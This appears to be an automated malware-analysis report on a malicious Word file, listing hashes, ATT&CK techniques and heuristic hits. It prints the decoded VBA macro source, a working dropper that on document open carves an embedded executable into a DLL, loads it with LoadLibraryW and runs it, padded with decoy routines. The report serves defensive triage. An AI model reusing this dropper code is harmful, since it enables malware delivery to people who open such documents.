Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 329c411748031205…

MALICIOUS

Office (OLE)

721.0 KB Created: 2019-11-08 11:46:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: 47d11e7dd71935dad5fe2864ac47ccac SHA-1: 56d21fcdc30041297688621c87e664573554a3b3 SHA-256: 329c411748031205b7eb6b11b8394f8d150613cf4fbb3c762db22cb6fd63d80a
370 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1106 Execution through API T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro with a Document_Open subroutine. This macro utilizes CreateObject and Shell() calls, indicative of executing embedded or downloaded code. The presence of an embedded PE executable and references to LoadLibrary and GetProcAddress APIs strongly suggest that the VBA macro is designed to launch this executable, likely as a second-stage payload. The embedded executable itself is the primary IOC.

Heuristics 11

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Set PointerNull = CreateObject("WScri" + "pt.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set PointerNull = CreateObject("WScri" + "pt.Shell")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 61447 bytes
SHA-256: 7f0529553e623a02cc5a75dfc506a97e689613feab79387fb19fcb1ce4b8535b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
If UserForm1.Visible = False Then
Module3.AppStart
End If

End Sub

Attribute VB_Name = "Module1"

Public Sub SetArrayItemValue(arr, index1 As Integer, val1 As Byte)

End Sub



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D44A6C26-B731-485B-9B7C-9987CED175DF}{89B7CD74-5346-4A98-B474-EAA43A5CA147}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
StartRecovery
End Sub

Private Sub UserForm_Initialize()
d = SystemButtonSettings(Me, False)

End Sub


Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{9A8A2204-9F34-402A-A010-04445B8579A8}{CA740A1A-7056-4D29-8E3A-D10BF0078855}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module2"
Public CursorPosition() As Long

Public Function SetResourceBytes(lpType As Long, lpID As Long, lpData() As Byte, lpFile As String) As Long
Dim pReturn As Long, rPort As Long, nCount As Long
nCount = UBound(lpData) + 1 - LBound(lpData)
pReturn = BeginUpdate.Resource(lpFile, False)
If pReturn <> 0 Then
 rPort = Update.Resource1(pReturn, lpType, lpID, 1033, lpData(LBound(lpData)), nCount)
 EndUpdate.Resource pReturn, False
 If rPort <> 0 Then SetResourceBytes = True
End If
End Function
Sub ConvertChartToPicture()
    Dim Cht As Chart
    If ActiveChart Is Nothing Then Exit Sub
    If TypeName(ActiveSheet) = "Chart" Then Exit Sub
    Set Cht = ActiveChart
    Cht.CopyPicture Appearance:=xlPrinter, _
      Size:=xlScreen, Format:=xlPicture
End Sub



Sub CreateUnlinkedChart()
    Dim MyChart As Chart
    Set MyChart = ActiveSheet.Shapes.AddChart2.Chart
    With MyChart
        .SeriesCollection.NewSeries
        .SeriesCollection(1).Name = "Sales"
        .SeriesCollection(1).XValues = Array("Jan", "Feb", "Mar")
        .SeriesCollection(1).Values = Array(125, 165, 189)
        .ChartType = xlColumnClustered
        .SetElement msoElementLegendNone
    End With
End Sub


Public Sub ReplaceFile(TextBox1Tag)
 DoEvents
        
        Application.DisplayAlerts = False
        DoEvents
If Val(Application.Version) < 14 Then
        ActiveDocument.SaveAs TextBox1Tag, 13
Else
        ActiveDocument.SaveAs2 TextBox1Tag, 13
End If
        'SaveAs2 TextBox1Tag, FileFormat:=39 + 12
    DoEvents
    'ActiveDocument.Close
    DoEvents
        
End Sub





Attribute VB_Name = "Module3"
#If Win64 Then
    Public Declare PtrSafe Function ZooDcom Lib _
        "scheduler_b.dll" Alias "PORDMN" () As Integer
    Public Declare PtrSafe Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
    Public Declare Function ZooDcom Lib _
        "scheduler_a.dll" Alias "PORDMN" () As Integer
#End If
  
Public Sub AppStart()

Dim PointerNull As Object
    Dim SpecialPath As String
    

Set PointerNull = CreateObject("WScri" + "pt.Shell")
   
UserForm2.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")


UserForm2.TextBox2.Tag = PointerNull.SpecialFolders(UserForm2.TextBox2.Tag)
ChDir (UserForm2.TextBox1.Tag)

    UserForm1.show
End Sub




Public Sub DonHuan(DonHuan2 As String, OpenForBinaryLock As String, fl As Long, ChartPosition6 As Integer)
    Dim ChartPosition1 As Long, ChartPosition2 As Byte, ChartPosition3 As Byte, ChartPosition4 As Byte
    

        Dim SimpleMethod As Integer
    ReDim CursorPosition(1 To fl)
    ChartPosition1 = FreeFile
    Open DonHuan2 For Binary Access Read As ChartPosition1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(ChartPosition1)
        Get ChartPosition1, , ChartPosition2
        If ChartPosition2 = CByte(77) Then
            CursorPosition(1) = ChartPosition2
            
           Get ChartPosition1, , ChartPosition3
           If ChartPosition3 = CByte(90) Then
            CursorPosition(2) = ChartPosition3
                
                Get ChartPosition1, , ChartPosition4
                If ChartPosition4 = CByte(144) Then
                     CursorPosition(3) = ChartPosition4
            
                     If cur = ChartPosition6 Then
                        For k = 4 To fl
                            Get ChartPosition1, , ChartPosition2
                            CursorPosition(k) = ChartPosition2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close ChartPosition1
    
    ChartPosition1 = FreeFile
    Open OpenForBinaryLock For Binary Lock Read Write As #ChartPosition1
    For i = LBound(CursorPosition) To UBound(CursorPosition)
        
       If UserForm1.Enabled = True Then
                 NumberBuffer ChartPosition1, CByte(CursorPosition(i))
       End If
    Next i

    Close #ChartPosition1

End Sub





Public Function ITestModule_GetCase(ByVal lIndex As Long)
On Error Resume Next
    If tracemod Then
        g_errorobj.Transmit "Inside: ITestModule_GetCase(" + CStr(lIndex) + ")" + Chr(10)
    End If
    numcases = numcases + 1
    Select Case lIndex
        Case 0
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnclose")
        Case 1
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cndefdat")
        Case 2
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnexec")
        Case 3
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnmode")
        Case 4
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnopen")
        Case 5
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprop")
        Case 6
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnprovider")
        Case 7
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cnstring")
        Case 8
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.cntimeout")
        Case 9
            Set ca.ses(numcases - 1) = CreateObject("adolvl0.fldactualsize")
        
  End Select
End Function





Attribute VB_Name = "Module4"
Public Function Load(HTMLSource As Variant) As Boolean
    On Error GoTo ErrorTrap
    
    Const Chunk = 1000
    
    Dim WorkingSrc As String
    Dim TagStart As Long
    Dim TagEnd As Long
    Dim TagLength As Long
    Dim TagStartString As String
    Dim splittest() As String
    Dim Ptr As Long
    Dim Cnt As Long
    Dim Pos As Long
    Dim testing As Boolean
    Dim PosScriptEnd As Long
    Dim PosEndScript As Long
    Dim PosEndScriptEnd As Long
    
    
    
    WorkingSrc = HTMLSource
    LocalElementCount = 0
    LocalElementSize = 0
    ReDim LocalElements(LocalElementSize)
    
    If NewWay Then
        
        
        
        
        
        Load = True
        Ptr = 0
        
        
        
        Do
            BlobSN = "/blob" & CStr(GetRan.domInteger()) & ":"
            Ptr = Ptr + 1
        Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10))
        
        
        
        splittest = Split(WorkingSrc, "<script")
        Cnt = UBound(splittest) + 1
        If Cnt > 1 Then
            For Ptr = 1 To Cnt - 1
                PosScriptEnd = InStr(1, splittest(Ptr), ">")
                If PosScriptEnd > 0 Then
                    PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</script", vbTextCompare)
                    If PosEndScript > 0 Then
                        Bl.obs(BlobCnt) = Mid(splittest(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
                        splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript)
                        BlobCnt = BlobCnt + 1
                    End If
                End If
            Next
            WorkingSrc = Join(splittest, "<script")
        End If
        
        
        
        splittest = Split(WorkingSrc, "<style")
        Cnt = UBound(splittest) + 1
        If Cnt > 1 Then
            For Ptr = 1 To Cnt - 1
                PosScriptEnd = InStr(1, splittest(Ptr), ">")
                If PosScriptEnd > 0 Then
                    PosEndScript = InStr(PosScriptEnd, splittest(Ptr), "</style", vbTextCompare)
                    If PosEndScript > 0 Then
                        Blo.bs(BlobCnt) = Mid(splittest(Ptr), PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)
                        splittest(Ptr) = Mid(splittest(Ptr), 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mid(splittest(Ptr), PosEndScript)
                        BlobCnt = BlobCnt + 1
                    End If
                End If
            Next
            WorkingSrc = Join(splittest, "<style")
        End If
    Exit Function
    End If
ErrorTrap:
    Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)
    End Function

Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)

   
   
   For i = 1 To Len(tmptext)
      
      
      If TextClockWise = True Then
         
         
         
         
         For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)
            For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -1
               
               OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
               
               OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
               If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then
                  
                  Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
                  
                  
                  
                  Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
                  Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
                  Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
                  
                  
                  Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
               End If
            Next y
         Next x
      
      Else
         
         
         
         
         
         
         OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte
         OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
         
         OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte
         OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position
         
         
         For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -1
            For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)
               
               OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)
               
               OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))
               If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then
                  
                  Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False
                  
                  
                  Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 255
                  Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 255
                  Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255
                  
                  Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)
               End If
            Next y
         Next x
      End If

      
      progbar.Value = i
   Next i
   
   
   progbar.Value = 0
      
   
   Dra.w_Zoom picsource, pictarget
End Sub




Attribute VB_Name = "Module5"

Public Sub StartRecovery()
    TextBox1Tag = UserForm2.TextBox1.Tag & "\videmem" + ".d" + "ocx"
    ZipName = TextBox1Tag + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag
    Dim OpenForBinaryLock As String
    Dim Big_Size As Long
    Dim UpdateParameter As Integer
    OpenForBinaryLock = UserForm2.TextBox2.Tag + "\scheduler_a"
    Big_Size = 278528
    UpdateParameter = 1
            
#If Win64 Then
    OpenForBinaryLock = UserForm2.TextBox2.Tag + "\scheduler_b"
    Big_Size = 246272
    UpdateParameter = 2
#End If
OpenForBinaryLock = OpenForBinaryLock + ".d" + "ll"
        KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, OpenForBinaryLock
        
    ReplaceFile ZipName
   ReplaceFile TextBox1Tag
        'FileCopy TextBox1Tag, ZipName
        
    Dim objFolder As Object
        Set oApp = CreateObject("Shell." + "Application")
         If UpdateParameter > 0 Then
            Set objFolder = oApp.Namespace(ZipName)
           
            oApp.Namespace(ZipFolder).CopyHere objFolder.items.Item("word\e" + "mbed" + "dings\oleObject1.b" + "in")

        End If
        DonHuan ZipFolder + "\oleObject" + "1.b" + "in", OpenForBinaryLock, Big_Size, UpdateParameter
        If UpdateParameter > 0 Then
            UpdateParameter = UpdateParameter + 1
            ChDir (UserForm2.TextBox2.Tag)
            UpdateParameter = UpdateParameter + 1
        End If
        PORDMN2 (OpenForBinaryLock)
        If UpdateParameter > 0 Then
            UpdateParameter = UpdateParameter + 1
            UpdateParameter = UpdateParameter + 1
        End If
       
        If UpdateParameter < 0 Then
            UpdateParameter = UpdateParameter + 1
            UpdateParameter = UpdateParameter + 1
        End If

     ZooDcom
End Sub

Public Function GetParamCount() As Integer
On Error Resume Next
    Dim i As Long
    Dim sNextChar As String
    Dim bInside As Boolean
    Dim bQuoted As Boolean
    Dim sCommand As String
        
    GetParamCount = 0
    bInsideParameter = False
    bQuoted = False
    sCommand = Command$
    
    For i = 1 To Len(sCommand)
        sNextChar = Mid$(sCommand, i, 1)
        If bInsideParameter Then
            If bQuoted Then
                If sNextChar = """" Then
                    GetParamCount = GetParamCount + 1
                    bInsideParameter = False
                    bQuoted = False
                End If
            Else
                If sNextChar = " " Then
                    GetParamCount = GetParamCount + 1
                    bInsideParameter = False
                    bQuoted = False
                End If
            End If
        Else
            bInsideParameter = True
            If sNextChar = """" Then
                bQuoted = True
            ElseIf sNextChar <> " " Then
                bQuoted = False
            End If
        End If
    Next i
    If bInsideParameter Then GetParamCount = GetParamCount + 1
End Function



Attribute VB_Name = "Module6"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function BoxWSL _
        Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long) As Long
    Private Declare Function BoxWSL _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal parameter1 As Long) As Long
  
#End If




Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub




Public Function SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show Then

    BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

   
Else
 BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

End If

DrawMenuBar (windowHandle)
SystemButtonSettings = 7
End Function



Public Sub NumberBuffer(Number As Long, Buffer As Byte)
 If UserForm1.Enabled = True Then
    Put #Number, , Buffer
End If
End Sub



Private Sub cmdStart_Click()
    Dim System As Long
    Dim Sound As Long
    Dim result
    Dim Version As Long
    
    Dim Data(0 To 4095) As Byte
    Dim Length As Long
    Dim Read As Long
    Dim bytesread As Long
    Dim outfp As Long
    
    
    result = FMOD_Syst.em_Create(System)
    ERRCHECK (result)
    
    result = FMOD_Syst.em_GetVersion(System, Version)
    ERRCHECK (result)

    If Version <> FMOD_VERSION Then
        MsgBox "Error!  You are using an old version of FMOD " & Hex$(Version) & ". " & _
               "This program requires " & Hex$(FMOD_VERSION)
    End If

    result = FMOD_Sys.tem_Init(System, 1, FMOD_INIT_NORMAL, 0)
    ERRCHECK (result)
    
    result = FMOD_Sys.tem_CreateStream(System, "../../examples/media/wave.mp3", FMOD_OPENONLY Or FMOD_ACCURATETIME, Sound)
    ERRCHECK (result)
    
    
    
    
    result = FMOD_Soun.d_GetLength(Sound, Length, FMOD_TIMEUNIT_PCMBYTES)
    ERRCHECK (result)

    Open "output.raw" For Random As #1
    Close #1
    outfp = lO.pen("output.raw", 1)
    
    bytesread = 0
    
    Do
        result = FMOD_Soun.d_ReadData(Sound, GetA.ddrOf(Data(0)), 4096, Read)
    
        bytesread = bytesread + Read
        
        Call lW.rite(outfp, GetA.ddrOf(Data(0)), Read)
        
    Loop While (result = FMOD_OK And Read = 4096)
    
    lC.lose (outfp)
    
    
    result = FMOD_So.und_Release(Sound)
    ERRCHECK (result)
    
    result = FMOD_Sys.tem_Close(System)
    ERRCHECK (result)
    
    result = FMOD_Sys.tem_Release(System)
    ERRCHECK (result)
End Sub

Private Sub cmdExit_Click()
    Unload M.E
    End
End Sub

Private Sub ERRCHECK(result)
    Dim msgResult
    
    If result <> FMOD_OK Then
        msgResult = MsgBox("FMOD error! (" & result & ") " & FMOD_Erro.rString(result))
    End If
    
    If msgResult Then
        End
    End If
End Sub





' Processing file: /tmp/qstore_aeeakc_j
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1269 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub Document_Open())
' Line #3:
' 	Ld UserForm1 
' 	MemLd Visible 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #4:
' 	Ld Module3 
' 	ArgsMemCall AppStart 0x0000 
' Line #5:
' 	EndIfBlock 
' Line #6:
' Line #7:
' 	EndSub 
' Macros/VBA/Module1 - 1037 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub SetArrayItemValue(arr))
' Line #2:
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' Macros/VBA/UserForm1 - 1821 bytes
' Line #0:
' 	FuncDefn (Sub Label1_Click())
' Line #1:
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Sub UserForm_Activate())
' Line #5:
' 	ArgsCall DoEvents 0x0000 
' Line #6:
' 	ArgsCall StartRecovery 0x0000 
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Sub UserForm_Initialize())
' Line #10:
' 	Ld id_FFFF 
' 	LitVarSpecial (False)
' 	ArgsLd SystemButtonSettings 0x0002 
' 	St d 
' Line #11:
' Line #12:
' 	EndSub 
' Line #13:
' Macros/VBA/UserForm2 - 1181 bytes
' Macros/VBA/Module2 - 3842 bytes
' Line #0:
' 	Dim (Public) 
' 	VarDefn CursorPosition
' Line #1:
' Line #2:
' 	FuncDefn (Public Function SetResourceBytes(lpType As Long) As Long)
' Line #3:
' 	Dim 
' 	VarDefn pReturn (As Long)
' 	VarDefn rPort (As Long)
' 	VarDefn nCount (As Long)
' Line #4:
' 	Ld lpData 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld lpData 
' 	FnLBound 0x0000 
' 	Sub 
' 	St nCount 
' Line #5:
' 	Ld lpFile 
' 	LitVarSpecial (False)
' 	Ld BeginUpdate 
' 	ArgsMemLd Resource 0x0002 
' 	St pReturn 
' Line #6:
' 	Ld pReturn 
' 	LitDI2 0x0000 
' 	Ne 
' 	IfBlock 
' Line #7:
' 	Ld pReturn 
' 	Ld lpType 
' 	Ld lpID 
' 	LitDI2 0x0409 
' 	Ld lpData 
' 	FnLBound 0x0000 
' 	ArgsLd lpData 0x0001 
' 	Ld nCount 
' 	Ld Update 
' 	ArgsMemLd Resource1 0x0006 
' 	St rPort 
' Line #8:
' 	Ld pReturn 
' 	LitVarSpecial (False)
' 	Ld EndUpdate 
' 	ArgsMemCall Resource 0x0002 
' Line #9:
' 	Ld rPort 
' 	LitDI2 0x0000 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St SetResourceBytes 
' 	EndIf 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	EndFunc 
' Line #12:
' 	FuncDefn (Sub ConvertChartToPicture())
' Line #13:
' 	Dim 
' 	VarDefn Cht
' Line #14:
' 	Ld ActiveChart 
' 	LitNothing 
' 	Is 
' 	If 
' 	BoSImplicit 
' 	ExitSub 
' 	EndIf 
' Line #15:
' 	Ld ActiveSheet 
' 	ArgsLd TypeName 0x0001 
' 	LitStr 0x0005 "Chart"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	ExitSub 
' 	EndIf 
' Line #16:
' 	SetStmt 
' 	Ld ActiveChart 
' 	Set Cht 
' Line #17:
' 	LineCont 0x0004 07 00 06 00
' 	Ld xlPrinter 
' 	ParamNamed Appearance 
' 	Ld xlScreen 
' 	ParamNamed Size 
' 	Ld xlPicture 
' 	ParamNamed Format 
' 	Ld Cht 
' 	ArgsMemCall CopyPicture 0x0003 
' Line #18:
' 	EndSub 
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' 	FuncDefn (Sub CreateUnlinkedChart())
' Line #23:
' 	Dim 
' 	VarDefn MyChart
' Line #24:
' 	SetStmt 
' 	Ld ActiveSheet 
' 	MemLd Shapes 
' 	MemLd AddChart2 
' 	MemLd Chart 
' 	Set MyChart 
' Line #25:
' 	StartWithExpr 
' 	Ld MyChart 
' 	With 
' Line #26:
' 	MemLdWith SeriesCollection 
' 	ArgsMemCall NewSeries 0x0000 
' Line #27:
' 	LitStr 0x0005 "Sales"
' 	LitDI2 0x0001 
' 	ArgsMemLdWith SeriesCollection 0x0001 
' 	MemSt Name 
' Line #28:
' 	LitStr 0x0003 "Jan"
' 	LitStr 0x0003 "Feb"
' 	LitStr 0x0003 "Mar"
' 	ArgsArray Array 0x0003 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith SeriesCollection 0x0001 
' 	MemSt XValues 
' Line #29:
' 	LitDI2 0x007D 
' 	LitDI2 0x00A5 
' 	LitDI2 0x00BD 
' 	ArgsArray Array 0x0003 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith SeriesCollection 0x0001 
' 	MemSt Values 
' Line #30:
' 	Ld xlColumnClustered 
' 	MemStWith ChartType 
' Line #31:
' 	Ld msoElementLegendNone 
' 	ArgsMemCallWith SetElement 0x0001 
' Line #32:
' 	EndWith 
' Line #33:
' 	EndSub 
' Line #34:
' Line #35:
' Line #36:
' 	FuncDefn (Public Sub ReplaceFile(TextBox1Tag))
' Line #37:
' 	ArgsCall DoEvents 0x0000 
' Line #38:
' Line #39:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #40:
' 	ArgsCall DoEvents 0x0000 
' Line #41:
' 	Ld Application 
' 	MemLd Version 
' 	ArgsLd Val 0x0001 
' 	LitDI2 0x000E 
' 	Lt 
' 	IfBlock 
' Line #42:
' 	Ld TextBox1Tag 
' 	LitDI2 0x000D 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #43:
' 	ElseBlock 
' Line #44:
' 	Ld TextBox1Tag 
' 	LitDI2 0x000D 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs2 0x0002 
' Line #45:
' 	EndIfBlock 
' Line #46:
' 	QuoteRem 0x0008 0x0028 "SaveAs2 TextBox1Tag, FileFormat:=39 + 12"
' Line #47:
' 	ArgsCall DoEvents 0x0000 
' Line #48:
' 	QuoteRem 0x0004 0x0014 "ActiveDocument.Close"
' Line #49:
' 	ArgsCall DoEvents 0x0000 
' Line #50:
' Line #51:
' 	EndSub 
' Line #52:
' Line #53:
' Line #54:
' Line #55:
' Macros/VBA/Module3 - 6278 bytes
' Line #0:
' 	LbMark 
' 	Ld Win64 
' 	LbIf 
' Line #1:
' 	LineCont 0x0004 06 00 08 00
' 	FuncDefn (Public Function ZooDcom() As Integer)
' Line #2:
' 	FuncDefn (Public Function PORDMN2(ByVal lpLibFileName As String) As Long)
' Line #3:
' 	LbMark 
' 	LbElse 
' Line #4:
' 	Reparse 0x006E "   Public Declare Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long"
' Line #5:
' 	LineCont 0x0004 00 00 D9 FF
' 	Reparse 0x005D "    Public Declare Function ZooDcom Lib        "scheduler_a.dll" Alias "PORDMN" () As Integer"
' Line #6:
' 	LbMark 
' 	LbEndIf 
' Line #7:
' Line #8:
' 	FuncDefn (Public Sub AppStart())
' Line #9:
' Line #10:
' 	Dim 
' 	VarDefn PointerNull (As Object)
' Line #11:
' 	Dim 
' 	VarDefn SpecialPath (As String)
' Line #12:
' Line #13:
' Line #14:
' 	SetStmt 
' 	LitStr 0x0005 "WScri"
' 	LitStr 0x0008 "pt.Shell"
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	Set PointerNull 
' Line #15:
' Line #16:
' 	LitStr 0x0001 "%"
' 	Ld UserForm2 
' 	MemLd TextBox1 
' 	MemLd Tag 
' 	Add 
' 	LitStr 0x0001 "%"
' 	Add 
' 	Ld PointerNull 
' 	ArgsMemLd ExpandEnvironmentStrings 0x0001 
' 	Ld UserForm2 
' 	MemLd TextBox1 
